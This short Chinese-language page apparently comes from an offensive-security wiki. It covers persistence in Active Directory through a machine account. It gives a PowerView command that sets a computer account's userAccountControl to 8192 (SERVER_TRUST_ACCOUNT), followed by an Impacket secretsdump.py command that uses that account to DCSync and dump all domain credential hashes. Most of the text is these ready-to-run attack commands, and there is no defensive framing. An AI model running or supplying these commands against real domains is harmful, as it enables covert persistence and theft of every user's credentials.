利用机器用户进行权限维持

前置知识

User-Account-Control用于控制用户帐户行为的标志，域内普通机器用户为0x1000

把标志改为0x2000即可使用该账户进行dcsync

利用

使用powerview修改

Set-DomainObject -Identity "test233$" -Set @{"userAccountControl" = 8192} -Verbose
# 修改test233$账户
Get-NetComputer -Identity "test233" -Properties name, primaryGroupID, userAccountControl

根据上面的SERVER_TRUST_ACCOUNT是对应0x2000（十六进制），作为系统备份域控制器的计算机账户

使用impact中secretsdump.py进行dcsync

secretsdump.py fbi.gov/test233\$:'Ice231...'@10.10.10.139 -just-dc
#secretsdump.py <DOMAIN>/<ComputerName>\$:'<Passwd>'@<DC-IP> -just-dc

Previous劫持不存在的DLL NextDACL权限维持

Last updated 2 years ago

hashtag前置知识

hashtag利用

前置知识

利用